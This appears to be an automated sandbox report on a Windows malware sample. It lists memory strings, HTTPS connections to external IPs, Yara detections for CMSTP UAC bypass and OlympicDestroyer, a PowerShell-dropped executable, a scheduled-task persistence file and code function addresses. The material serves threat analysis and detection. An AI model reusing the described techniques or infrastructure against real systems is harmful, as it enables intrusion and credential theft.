Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/Product
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/extensions-migration-in-import-wizard-116-rolloutH
Source: c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFEDA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarPrefs.sys.mjsresource:///modules/Urlba
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: c92938c010.exe, 00000010.00000003.2605720937.0000000006026000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2908502313.0000019CFED33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2920221170.0000019D00816000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2934609680.00001F74F7B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2933623282.000014908F32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDEDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2933623282.000014908F32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902767464.0000019CFE603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2932386721.00000595B9F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000022.00000002.2930962305.0000019D06F5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2808062718.0000019CFF7EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2916790143.0000019CFFCE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2853072649.0000019CFF7D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2808062718.0000019CFF7D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000022.00000002.2895818368.0000019CFDB8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2922378340.0000019D00CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2913522204.0000019CFF59B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2853072649.0000019CFF7D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2854807987.0000000DD0BD8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2864089087.0000019CED403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2922045046.0000019D00A2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2864089087.0000019CED411000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2912898850.0000019CFF459000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2863465709.0000019CED1B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2864089087.0000019CED45D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2808062718.0000019CFF7D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2863736709.0000019CED1F0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000020.00000002.2689360343.0000028895D67000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2700591994.000001D6E287F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2863736709.0000019CED1F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: b5c7128cd0.exe, 00000014.00000003.2737522115.0000000001732000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000003.2733338176.0000000001732000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000002.2750747616.000000000173A000.00000004.00000020.00020000.00000000.sdmp, b5c7128cd0.exe, 00000014.00000003.2732342322.000000000172E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd6E
Source: firefox.exe, 00000022.00000002.2882967787.0000019CFCC6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMO
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdRestartOnLastWindowC
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUPDATE

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49924 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 40.0.downloaded_file.exe.cd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 40.2.downloaded_file.exe.a2df98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 44.2.explorer.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 37.2.powershell.exe.27fe82da4b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 40.2.downloaded_file.exe.cd0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 40.2.downloaded_file.exe.a2df98.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 37.2.powershell.exe.27fe83582f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 37.2.powershell.exe.27fe83582f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 37.2.powershell.exe.27fe82da4b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 49.2.explorer.exe.2750000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: Process Memory Space: powershell.exe PID: 2188, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: b5c7128cd0.exe, 00000014.00000002.2740239849.0000000000F32000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_392ab912-c
Source: b5c7128cd0.exe, 00000014.00000002.2740239849.0000000000F32000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_07c52f9a-7

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name:
Source: 6dce78ba2b.exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: c92938c010.exe.6.dr	Static PE information: section name:
Source: c92938c010.exe.6.dr	Static PE information: section name: .idata
Source: c92938c010.exe.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: 2bd330404c.exe.6.dr	Static PE information: section name:
Source: 2bd330404c.exe.6.dr	Static PE information: section name: .idata
Source: 2bd330404c.exe.6.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0096CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

6_2_0096CB97

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010231A8	0_2_010231A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01027049	0_2_01027049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01028860	0_2_01028860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010278BB	0_2_010278BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE4B30	0_2_00FE4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01022D10	0_2_01022D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE4DE0	0_2_00FE4DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01017F36	0_2_01017F36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102779B	0_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009978BB	1_2_009978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00997049	1_2_00997049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00998860	1_2_00998860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009931A8	1_2_009931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00954B30	1_2_00954B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00954DE0	1_2_00954DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00992D10	1_2_00992D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0099779B	1_2_0099779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00987F36	1_2_00987F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009978BB	2_2_009978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00997049	2_2_00997049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00998860	2_2_00998860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009931A8	2_2_009931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00954B30	2_2_00954B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00954DE0	2_2_00954DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00992D10	2_2_00992D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0099779B	2_2_0099779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00987F36	2_2_00987F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0095E530	6_2_0095E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00976192	6_2_00976192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00998860	6_2_00998860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00954B30	6_2_00954B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00954DE0	6_2_00954DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00992D10	6_2_00992D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00970E13	6_2_00970E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00997049	6_2_00997049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009931A8	6_2_009931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00971602	6_2_00971602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0099779B	6_2_0099779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009978BB	6_2_009978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00973DF1	6_2_00973DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00987F36	6_2_00987F36
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140013021	7_2_0000000140013021
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140013507	7_2_0000000140013507
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140010210	7_2_0000000140010210
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140015220	7_2_0000000140015220
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_000000014000EA48	7_2_000000014000EA48
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140014E80	7_2_0000000140014E80
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140014E90	7_2_0000000140014E90
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140012E97	7_2_0000000140012E97
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140015F30	7_2_0000000140015F30
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_000000014000B758	7_2_000000014000B758
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Code function: 7_2_0000000140013798	7_2_0000000140013798
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2B6B5	16_2_06B2B6B5
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B366AB	16_2_06B366AB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B05EAB	16_2_06B05EAB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1BE83	16_2_06B1BE83
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B35EF0	16_2_06B35EF0
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B33EEB	16_2_06B33EEB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFEEC6	16_2_06AFEEC6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFA6C4	16_2_06AFA6C4
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF9ED6	16_2_06AF9ED6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AEDE2D	16_2_06AEDE2D
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B10634	16_2_06B10634
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B03E3C	16_2_06B03E3C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0A624	16_2_06B0A624
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0DE26	16_2_06B0DE26
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B02E0F	16_2_06B02E0F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B16677	16_2_06B16677
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0E67B	16_2_06B0E67B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFD677	16_2_06AFD677
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B06E55	16_2_06B06E55
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1C657	16_2_06B1C657
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B37646	16_2_06B37646
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2A64C	16_2_06B2A64C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B247B3	16_2_06B247B3
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B31FB0	16_2_06B31FB0
